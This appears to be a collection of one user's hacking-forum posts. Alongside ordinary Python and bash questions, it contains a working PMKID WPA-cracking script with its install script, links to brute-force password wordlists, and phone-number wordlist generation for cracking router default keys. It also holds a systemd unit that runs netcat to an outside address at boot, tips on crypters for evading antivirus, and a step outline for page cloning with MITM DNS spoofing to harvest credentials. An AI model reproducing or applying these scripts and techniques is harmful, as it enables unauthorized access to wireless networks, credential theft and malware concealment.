[Good Password List]

On 12/19/2018 at 12:40 AM, digininja said:

Bigger lists are not always better. Most serious password crackers use smaller lists and rules.

This is correct.

On 12/19/2018 at 12:36 AM, Cherimoya said:

Hi!

If anyone needs good password list for bruteforce hacking - bigpasswordlist.com

I've downloaded all biggest lists and merged them together.

List is good.

If you are collecting wordlists here's a compilation I put together from about 1200 sources. 8-63 character list for cracking WPA. Over a billion entries.

https://drive.google.com/file/d/0B8Mz8bu8fJ4kTnJXWlZLMUtmRkk/view?usp=sharing

[Python3 convert StringVar() to string?]

I figured this. .get() will give you the text of the entry box so you can set that as a variable like so.

package=e.get()

 

[Python3 convert StringVar() to string?]

I'm learning tkinter for python3. I'm trying to use a StringVar() from Entry (txtbox)

txtvara = StringVar()

c=Button(root)
photo1=PhotoImage(file="/root/install.gif")
c.config(image=photo1,width="100",height="30",activebackground="#f2f1f0",bg="#f2f1f0",command=sysinstall)
c.place(x = 100,y = 92)

e=Entry(root, width=12,textvariable=txtvara)
e.place(x = 3, y = 92)

I want to use the text in the system call but I can't even get it to print the variable to console. It just prints PY_VAR1 which I don't really understand.

def sysinstall():
    txtvarb = str(txtvara)
    print(txtvarb)

Question: How do I convert StringVar() into string and use that to change label text in a system call?

[Help with PMKID cracking script? BASH]

Also on Ubuntu there is a daemon you have to uninstall  to get aircrack suite to work now. I can't remember the name of it right off hand.

[Systemd services and networking permissions?]

I have a hypothetical.

I was running a script as system service . The script makes calls to networking tools. Some of those tools are getting no route to host errors. I'm pretty sure the network is up. I can login on all of the test machines and scan them. There's definitely network services on all of the machines. I think the problem is with the service having permissions on certain ports or systemd not allowing services to use certain ports or services. But I'm not really sure I haven't ran into this problem before.

What are some  possible problems systemd services can have with permissions on networking services and how do I fix? Besides the unit file (.service) are there some other configuration files I need to edit to make networking services available to my script?

Sorry if this is a little vague.

What are some good references on system services and networking permissions?

[Help with PMKID cracking script? BASH]

On 10/31/2018 at 6:32 AM, icarus255 said:

I love the first part of your script. I've been too lazy to write something like that myself even though after all these years I still go through the motions each time I want to fire up airmon/airodump.

I'm not sure what you're trying to do after:

I'm a terrible coder but from a practical perspective, why are you running airodump for 10secs and then running hcxdumptool? From the code it seems you are trying to output a list of the essids from airodump to feed into hcxdumptool filter list. 

Hcxdumptool is independent of the aircrack/airodump suite. Hcx scans nearby devices on its own and performs all the attacks on any device broadcasting a beacon. You don't need to put the interface into monitor mode for hcx, it will do it on its own. i.e. hcxdumptool -o outputfile.pcapng --enable-status=3 -i $INTERFACE 

You also need to clean up the output file for hashcat before you can run 16800 mode. i.e. hcxpcaptool -E essidlist.txt -z pmkidlist.txt outputfile.pcapng then you can run hashcat on the pmkidlist.txt

I'm not sure if I misunderstood your script and/or intentions but I will try editing it tonight and see what results I get.

I was grabing the MAC addresses from airodump's output.

[Using grep with a variable?]

I was working on a script that would get MAC addresses from a text file then indentify their make. I ran into  a problem with grep while trying to use a variable for pattern matching.

Firstly I was getting the MACs from a file and save them to a separate file. #I suck at regular expressions so you know a shorter way to write this please tell me.

grep -io '[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}' /root/air/NPC-01.csv | sort -u > /root/air/macs.txt

The following statement works if I want to retrieve a single manufacturer.

grep $(echo 00:20:8C:30:40:60 | cut -d ':' -f 1,2,3 | sed 's/:/-/g') /etc/unicornscan/oui.txt | cut -d ':' -f 2

But really I want to to something like this. The problem is I'm not sure if grep will even work like this. Basically I want to take $line from mac.txt (where macs.txt is simply a list of MAC addresses) and get the first three hexadecimal pairs and check them against oui.txt

cat /root/air/macs.txt | while read line; do

grep $(echo $line | cut -d ':' -f 1,2,3 | sed 's/:/-/g') /etc/unicornscan/oui.txt | cut -d ':' -f 2;  done

I tried this a couple of different ways. I wasn't sure how to make grep or egrep take variables. Basically the problem I've been having is grep will want to puke out the entire contents of oui.txt or nothing at all.

[Epoch time converter for Linux?]

13 hours ago, Just_a_User said:

I only found Python also

#!/usr/bin/python
import time
import datetime
import sys
#
# script calculates the time sind epoch (1970-01-01 00:00am UTC)
#

if len(sys.argv) < 2:
        print "Usage: %s 2011-10-25 [19:30:00]" % (sys.argv[0])
        sys.exit(1)
elif len(sys.argv) !=3:
	u_time = "00:00:00"
else:
	 u_time = sys.argv[2]
  
u_date = sys.argv[1]
u_input = "%s %s"  % (u_date, u_time)
print "epoch for given time: \t %s" % (int(time.mktime(time.strptime(u_input, '%Y-%m-%d %H:%M:%S'))))
now = int( time.time() )
print "epoch timezone: \t %s" % (now)

Thanks,

This is a time saver.

 

 

 

 

[Just tinkering with MAC Addresses]

You can get MAC addresses from a file with a statement like this.

grep -io '[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}:[A-Z0-9]\{2\}' /root/air/NPC-01.csv | sort -u > /root/air/NPC.txt

And you can get the manufacturer information with a statement like.

grep $(echo 00:20:8C:30:40:60 | cut -d ':' -f 1,2,3 | sed 's/:/-/g') /etc/unicornscan/oui.txt | cut -d ':' -f 2

I was trying to figure out a way to loop through the text file containing the MACs and grepping each line from oui.txt. But I can't figure out a way to get grep to play nice with variables and loops.

[Epoch time converter for Linux?]

Can anyone suggest a command line tool to convert any calendar date to an epoch time?

I don't want current time as epoch. I want to be able to input a calender date and get epoch. I noticed there are a lot of Javascript tools that do this but I was wonder if there is a command line tool. I'll code it if I have to, but time would be better spent elsewhere if it already exists.

I noticed date time groups are easiest to work with as epoch time. At least for doing comparison operators.

Here's a python snippet that essentially does what I'm looking for. Is there a native Linux application that does this?

#!/usr/bin/python
import datetime
import calendar
aprilFirst=datetime.datetime(2012, 11, 12, 0, 0)
print(calendar.timegm(aprilFirst.timetuple()))

This works for now.

#!/usr/bin/python
import sys
from sys import argv
import datetime
import calendar

year = int(argv[1])
month = int(argv[2])
day = int(argv[3])
minute = int(argv[4])
second = int(argv[5])

aprilFirst=datetime.datetime(year, month, day, minute, second)
#usage py_epoch.py year month day minute second
print(calendar.timegm(aprilFirst.timetuple()))

 

[Python Question: Correct way to get stdout as variable and use in a system call?]

iw dev |grep -i interface | cut -d ' ' -f 2

Perfect. Thanks.

Actually there are plenty of automated wireless attack scripts available already. I'm trying to learn how to code deeper system automation. I need to be able to deal with outputs. I started working with python because python is easy compared to other languages. I'll probably port some of my BASH scripts over to python once I get a better handle on that. It seems to be what the cool kids are doing.

[Python Question: Correct way to get stdout as variable and use in a system call?]

I'm trying to get the output of a command as a variable and use it for a system call. Mostly I'm trying to get the concept of this by doing something easy like changing a MAC address.
Firstly I want to get the wireless interface. I know I can make <iface> a command line option and I'm sure that's a better way to go but it's not really the point.

There are several ways to get the wireless interface. Some of the stuff I tried.

cat /proc/net/wireless | tail -n 1 | cut -d ' ' -f 2 | tr -d ':' | sed '/^\s*$/d' #this method is completely unreliable

ifconfig | tail | head -2 |  sed '/^\s*$/d' | cut -d ":" -f 1 #this seems to work

ip link show | tail -n 2 | head -n 1 | cut -d ':' -f 2 | cut -d ' ' -f 2 #maybe

Then I tried iwfconfig I think it is several outputs instead of one. So head, tail, and grep don't seem to work on it. I tried readarray as well. I didn't want to write to a file then cat the file into read array or read the file from the python script because usually there is a more elegant way of doing things. I just don't know how to do it.

Question is there a more elegant way of doing this stuff?

import subprocess
from subprocess import call

batcmd="cat /proc/net/wireless | tail -n 1 | cut -d ' ' -f 2 | tr -d ':'"
wlan = subprocess.check_output(batcmd.strip(), shell=True)
print(wlan).strip()

call(["ifconfig", wlan.strip(), "down"])
call(["macchanger", "-r", wlan.strip()])
call(["ifconfig",  wlan.strip(), "up"])

I tried this and it works sometimes. But sometimes fails because cat fails to return the wireless interface.

import subprocess
from subprocess import call

batcmd="ifconfig | tail | head -2 |  sed '/^\s*$/d' | cut -d ':' -f 1"
wlan = subprocess.check_output(batcmd.strip(), shell=True)
print(wlan).strip()

call(["ifconfig", wlan.strip(), "down"])
call(["macchanger", "-r", wlan.strip()])
call(["ifconfig",  wlan.strip(), "up"])

I wasn't sure if subprocess is the best of way of doing this. What I really need is ways to get stdout and use it in a system call.

[Telephone area codes and prefixes database? For Wordlist generation]

For whatever reason the text file I ended up with had some extra carriage return or newline characters and crunch was counting some of those as extra characters so crunch was throwing errors. So I wrote a quick python script to write out all of the digits.

#!/usr/bin/python
import sys
l = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
   	
for a in range(0, 9):
	for b in range(0, 9):
		for c in range(0, 9):
			for d in range(0, 9):
				with open("/root/Desktop/areacodes/one.txt") as f:
					for line in f:
						i=(line.strip())+(l[a])+(l[b])+(l[c])+(l[d])
						print i

It took about 11 minutes to generate the list. 1,090,503,810 lines and a little under 12GB which is about 11% of the 10,000,000,000 lines and 102 GB that crunch would have produced. At any rate generating a rainbow table that size would probably take months so splitting it into lists with local numbers then generating the tables would probably be the way to go. I'll put the list of up for download like with my other wordlists because it took a little bit of work to put together.

[Telephone area codes and prefixes database? For Wordlist generation]

Kinda seems like the information would be out there already and readily available. It's weird, you used to be able to find this stuff easily. Seems there more websites there are the harder it is to find useful information.

your suggestion on scripting seems to be right course of action. Maybe something like this:

#!/bin/bash

SITE="https://www.allareacodes.com/"

cat /root/Desktop/areacodes.txt | while read line; do

URL=$SITE$line

sleep 15
wget $URL; done

grep -o '([0-9]\{3\})[^\s][0-9]\{3\}' /root/Desktop/areacodes/ > areaprefix.txt

 

[Telephone area codes and prefixes database? For Wordlist generation]

On 10/7/2018 at 10:24 PM, i8igmac said:

./crunch 10 10 -t 206%%%%%%% -o /root/206.txt

This is pretty much what I'm doing.

Say there are 53 valid prefixes in Seattle. I would put those into prefixes.txt read through the list and call crunch with the area code and prefix. The wordlist it will generate is 530,000 lines rather than 10,000,000. The rainbow table takes 23 minutes to generate rather than 7 hours.

#!/bin/bash

touch seattlenumbers.txt

AREACODE="206"
DIGITS="%%%%"

cat /root/prefixes.txt | while read line; do

NUMBER=$AREACODE$line$DIGITS

crunch 10 10 -t $NUMBER >> seattlenumbers.txt; done

 

[Trumps mass text. data collection of gps location and contacts list.]

I'd like to see this.

[Telephone area codes and prefixes database? For Wordlist generation]

I was hoping find a good list of possible US phone numbers. Back in the day I had a database of all of the cities, zip codes, area codes, prefixes etc, but I can't remember what it was called or where I got it from. Basically I was going to use all of the possible valid area codes and phone numbers for some NETGEARXX rainbow tables. But I really didn't want to generate a 102 GB wordlist when only a fraction of the words are going to be possible valid numbers.

Anybody know where I can find a file with valid area code and prefix information? Is it in one of the geolocation databases?

 

[Wireless hotspot or router as service? Linux]

I thought this would be easier. I'm going to have to do more scripting when I have time.

[Wireless hotspot or router as service? Linux]

I want to create a wireless hotspot as a system service so when I boot a particular device it becomes it's wireless hotspot becomes available.

Are there some configuration files for this? One tutorial I found says open /etc/NetworkManager/system-connections/wifi-hotspot and change and change it from mode=infrastructure to mode=ap. This file doesn't exist on my machine. Should I create this file or is there something more up to date?

Is there a recommended way to make my Linux PC act as a wireless router? I've looked this up but all I get is a bunch of ads from wireless cellphone companies for hotspotting features on their phones and that's not going to help me.

[Exploits Metaspoilt ip adress]

Exploit needs to be aimed a machine that has that particular exploitable vulnerability. Specific version of software running specific architecture.
Payload is operating system specific. Types of payloads go with certain exploits.

There are some intentionally vulnerable distros like metasploitable. You can run them in a virtual machine and try to hack them. This is a fun way to learn hacking. There are some videos on Adrian Crenshaw's channel https://www.youtube.com/user/irongeek

Mubix's Metasploit Minute is might be a good start. Also it wouldn't hurt to watch all of the Hak5 videos.

Pretty much if you just look up exploitation, post-exploitation, encoders, payloads, payload generation, mefvenom, msfconsole, metasploit, armitage.

It might be a good strategy to look up the exploit you want to use. You can find a video tutorial on YouTube, or a written tutorial usually using Google. Syntax or commands might be off so you might have to look through a bunch of tutorials and find the parts that work on put them together. You can find usage for every exploit on the Rapid7 website. So if you look up ms08_067 Rapid7 Metasploit or something like that you will find the official documentation on that metasploit module.

Metasploit The Penetration Tester's Guide

I'm not sure if there is a current edition. The older edition shows syntax for msfencode and msfpayload which were later combined into msfvenom. But conceptually the book will give you what you need.

I recommend reading pretty much all of the books from No Sartch Press.

Best of luck.

[Is it possible to change a .exe into a .jpeg or .pdf ?]

Look into polyglots and steganography. Stegosploit and similar projects are worth looking into.
 

 

[What's the best encoder tool for hiding from AV?]

On 4/4/2018 at 7:13 AM, Broti said:

And there's always the possibility the cryptor itself gets flagged by AV 

Exactly. AVs recognize the behavior of common encoders.

There are some good tutorials on the subject of writing your own encoder or crypter.

[Running netcat on Raspberry Pi boot]

On 7/25/2018 at 5:03 PM, kdodge said:

I believe that systemd is used in kali:
you might be able to run it as a service like this

On 7/25/2018 at 5:03 PM, kdodge said:

I believe that systemd is used in kali:
you might be able to run it as a service like this

$ cat /lib/systemd/system/netcat.service
[Unit]
Description=Run a netcat session
After=network.target

[Service]
Type=simple
User=kaliuser
WorkingDirectory=/home/kaliuser
ExecStart=/bin/netcat 192.168.1.215 443 -w 10
Restart=on-failure

[Install]
WantedBy=multi-user.target
$ sudo systemctl enable netcat.service

 

 

You'll probably want to reload the systemd daemon.

systemctl daemon-reload

before

systemctl enable netcat
systemctl start netcat

[CryptoMining Via Youtube?]

Pretty straight forward. Sounds like something a teenager would do on public wifi like a at a library. Illegal, mostly pointless, and not very profitable.
Clone target webpage
Insert obfuscated coinhive hoplink in cloned page
do MITM attack with DNS spoofing and use cloned page to harvest credentials

[Help with PMKID cracking script? BASH]

I was trying out this PMKID attack for WPA. I realized it was a lot of typing. There's a bit of manual installation for the tools so I wrote an install script. The install script works but I'm having trouble with getting the right output from airodump-ng. The script takes two arguments. ./pmkidcrack.sh <ESSID> <interface>

I want to run airodump for about 10 seconds and write to a csv file.
 

timeout 10 airodump-ng -w "${ESSID}" "${mon}"

Then get the MAC address that corresponds to the ESSID that I want to attack.
 

cat "${ESSID}-01.csv" | grep  $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > /root/mac.txt

There's probably some other stuff I'm doing wrong here but here's the script so far.

#!/bin/bash

ESSID=$1
INTERFACE=$2

systemctl stop NetworkManager
service wpa_supplicant stop
#change this
killall dhclient
airmon-ng check kill

#wifi=$(find /sys/class/net | grep wlx | cut -d '/' -f 5)

ifconfig $INTERFACE down
macchanger -r $INTERFACE
ifconfig $INTERFACE up
airmon-ng start $INTERFACE
mon=$(find /sys/class/net | grep mon | cut -d '/' -f 5)

##edit this shit

#timeout 10 airodump-ng -w $ESSID $mon

timeout 10 airodump-ng -w "${ESSID}" "${mon}"

cat "${ESSID}-01.csv" | grep  $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > /root/mac.txt
hcxdumptool -o hash -i $mon --filterlist=mac.txt --filtermode=2 --enable_status=3
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
rm /root/mac.txt "/root/${ESSID}-01.csv" /root/hashtocrack "/root/$ESSID-01.cap" "/root/${ESSID}-01.kismet.csv" "/root/${ESSID}-01.kismet.netxml"
rm mac.txt "${ESSID}-01.csv" hashtocrack "${ESSID}-01.cap" "${ESSID}-01.kismet.csv" "${ESSID}-01.kismet.netxml"
airmon-ng stop wlan0mon
systemctl start NetworkManager
service wpa_supplicant start
#change this
systemctl start dhclient
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

Also here's the install script for the dependencies. Might be different on your system. I've got about 2000 lines in my history on this install so things might already be installed. Let me know if you have some issues installing and what you did to fix them. Thanks.

#!/bin/bash

#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU

apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y
apt-get install opencl -y
apt-get install ocl-icd-opencl-dev -y

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install

git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install

git clone https://github.com/hashcat/hashcat
cd hashcat
make
make install

Tutorial for cracking PMKID